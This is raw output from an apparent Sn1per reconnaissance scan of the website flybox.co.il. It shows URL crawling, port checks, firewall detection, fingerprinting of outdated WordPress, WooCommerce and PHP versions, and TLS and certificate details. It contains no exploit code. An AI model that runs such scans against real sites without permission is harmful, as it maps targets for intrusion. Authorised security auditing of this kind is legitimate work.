- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 82 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/apply-gift-voucher/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 83 / 100 [1;37m][0;37m-[05:19:38][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-videos/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 84 / 100 [1;37m][0;37m-[05:19:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/ש××ך××-2/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 85 / 100 [1;37m][0;37m-[05:19:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/××ª× ×-×ק×ך×ת/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 86 / 100 [1;37m][0;37m-[05:19:41][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-press/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 87 / 100 [1;37m][0;37m-[05:19:42][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××××-××ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 88 / 100 [1;37m][0;37m-[05:19:43][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/custom-packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 89 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/××ך××¢-××ך×/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 90 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/test-custom-packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 91 / 100 [1;37m][0;37m-[05:19:44][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×ª×§× ××-×¢×××-תש×××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 92 / 100 [1;37m][0;37m-[05:19:45][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/category/news/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 93 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××××-××××××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 94 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×¢×€××-××€×¢×-×ך×ש×× ×/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 95 / 100 [1;37m][0;37m-[05:19:46][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/selected-package/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 96 / 100 [1;37m][0;37m-[05:19:47][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/contact-test/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 97 / 100 [1;37m][0;37m-[05:19:48][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/choose-package/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 98 / 100 [1;37m][0;37m-[05:19:50][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/ך×ש××-×× ×××××ך/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 99 / 100 [1;37m][0;37m-[05:19:50][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/2016/11/25/××ךק׊××-×××-××ש׀××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m[ INFO ] [ Shutting down ][0m
- [1;37m[ INFO ] [ End of process INURLBR at [31-12-2017 05:19:50][0m
- [1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt ][0m
- [1;37m|_________________________________________________________________________________________[0m
- [1;37m\_________________________________________________________________________________________/[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 111 closed... skipping.[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [93m + -- --=[Port 443 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://flybox.co.il
- The site https://flybox.co.il is behind a CloudFlare
- Number of requests: 1
- [92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttps://flybox.co.il[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mRedirectLocation[0m[[37mhttps://www.flybox.co.il/[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m]
- [1m[34mhttps://www.flybox.co.il/[0m [200 OK] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mFrame[0m, [1m[37mGoogle-Analytics[0m[[1m[32mUniversal[0m][[1m[36mUA-87930745-1[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mJQuery[0m[[1m[32m1.0.5,2.1.3[0m], [1m[37mMetaGenerator[0m[[37mWooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8[0m], [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFlybox - ××ךק׊×× ××ך×× ××× ××ש׀×× ××××ך××! ×× ×ךת ך×× ××××¢× ××שך××[0m], [1m[37mUncommonHeaders[0m[[37mlink,access-control-allow-origin,cf-ray[0m], [1m[37mVimeo[0m, [1m[37mWordPress[0m[[1m[32m4.5.6[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m], [1m[37mX-UA-Compatible[0m[[37mIE=edge[0m]
- [92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mflybox.co.il[0m on port [32m443[0m using SNI name [32mflybox.co.il[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- [32mSecure[0m session renegotiation supported
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- [32mPreferred[0m TLSv1.2 [32m256[0m bits [32mECDHE-ECDSA-CHACHA20-POLY1305[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits [32mECDHE-ECDSA-AES128-GCM-SHA256[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits [32mECDHE-ECDSA-AES256-GCM-SHA384[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- [32mPreferred[0m TLSv1.1 [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- [32mPreferred[0m [33mTLSv1.0[0m [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- [1;34mSSL Certificate:[0m
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni165065.cloudflaressl.com
- Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: [32mDec 17 00:00:00 2017 GMT[0m
- Not valid after: [32mJun 25 23:59:59 2018 GMT[0m
- [1m
- ###########################################################
- testssl 2.9dev from [m[1mhttps://testssl.sh/dev/[m
- [1m
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
- [1m
- ###########################################################[m
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- [1mTesting all IPv4 addresses (port 443): [m104.31.75.239 104.31.74.239
- -----------------------------------------------------
- [7m Start 2017-12-31 05:20:05 -->> 104.31.75.239:443 (flybox.co.il) <<--[m
- further IP addresses: 104.31.74.239 2400:cb00:2048:1::681f:4bef
- 2400:cb00:2048:1::681f:4aef
- rDNS (104.31.75.239): --
- Service detected: HTTP
- [1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
- [1m SSLv2 [m[1;32mnot offered (OK)[m
- [1m SSLv3 [m[1;32mnot offered (OK)[m
- [1m TLS 1 [moffered
- [1m TLS 1.1 [moffered
- [1m TLS 1.2 [m[1;32moffered (OK)[m
- [1m TLS 1.3 [m[1;32moffered (OK)[m: draft 18
- [1m SPDY/NPN [mh2, spdy/3.1, http/1.1 (advertised)
- [1m HTTP2/ALPN [mh2, spdy/3.1, http/1.1 (offered)
- [1m[4m Testing ~standard cipher categories [m
- [1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
- [1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
- [1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
- [1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
- [1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
- [1m Triple DES Ciphers (Medium) [mnot offered (OK)
- [1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
- [1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
- [1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
- [0;32m PFS is offered (OK)[m TLS13-AES-256-GCM-SHA384
- TLS13-CHACHA20-POLY1305-SHA256
- ECDHE-ECDSA-CHACHA20-POLY1305-OLD
- ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305
- TLS13-AES-128-GCM-SHA256
- ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- [1m Elliptic curves offered: [msecp224r1 [0;32mprime256v1[m [0;32msecp384r1[m [0;32msecp521r1[m [0;32mX25519[m
- [1m[4m Testing server preferences [m
- [1m Has server cipher order? [m[1;32myes (OK)[m
- [1m Negotiated protocol [m[1;32mTLSv1.3[m
- [1m Negotiated cipher [m[1;32mTLS13-AES-256-GCM-SHA384[m, [0;32m253 bit ECDH (X25519)[m
- [1m Cipher order[m
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
- TLS13-AES-128-GCM-SHA256
- [1m[4m Testing server defaults (Server Hello) [m
- [1m TLS extensions (standard) [m"renegotiation info/#65281" "server name/#0"
- "session ticket/#35" "status request/#5"
- "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23"
- "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- [1m Session Ticket RFC 5077 hint [m64800 seconds, session tickets keys seems to be rotated < daily
- [1m SSL Session ID support [myes
- [1m Session Resumption [mTickets: yes, ID: yes
- [1m TLS clock skew[m -1 sec from localtime
- [1m Signature Algorithm [m[0;32mECDSA with SHA256[m
- [1m Server key size [mECDSA [0;32m256[m bits
- [1m Fingerprint / Serial [mSHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
- SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
- [1m Common Name (CN) [m[3msni165065.cloudflaressl.com[m (request w/o SNI didn't succeed, usual for EC certificates)
- [1m subjectAltName (SAN) [m[3msni165065.cloudflaressl.com *.aonlineorder.tk
- *.bestproductthisyear.tk *.bigsale135store.tk
- *.bigsale171store.tk *.bigsale215store.tk
- *.bigsale248store.tk *.bigsale281store.tk
- *.bjfhiu.tk *.bsmartbuyer.tk
- *.bsmartonlineshop.tk *.btokoonlinemurah.tk
- *.budgettrouwfilm.nl *.dbranded.tk
- *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
- *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
- *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
- *.iperfectmarket.tk *.ismartxpress.tk
- *.jsmartonlineshop.tk *.jtopcharts.tk
- *.lalliexpress.tk *.lpayperclick.tk
- *.lpremiumonlineshop.tk *.onlinekanyakumari.com
- *.osmartbuyer.tk *.pawesomemarket.tk
- *.pbelimudah.tk *.rlinkaliexpress.tk
- *.rnesaliexpress.tk *.samriddle.website
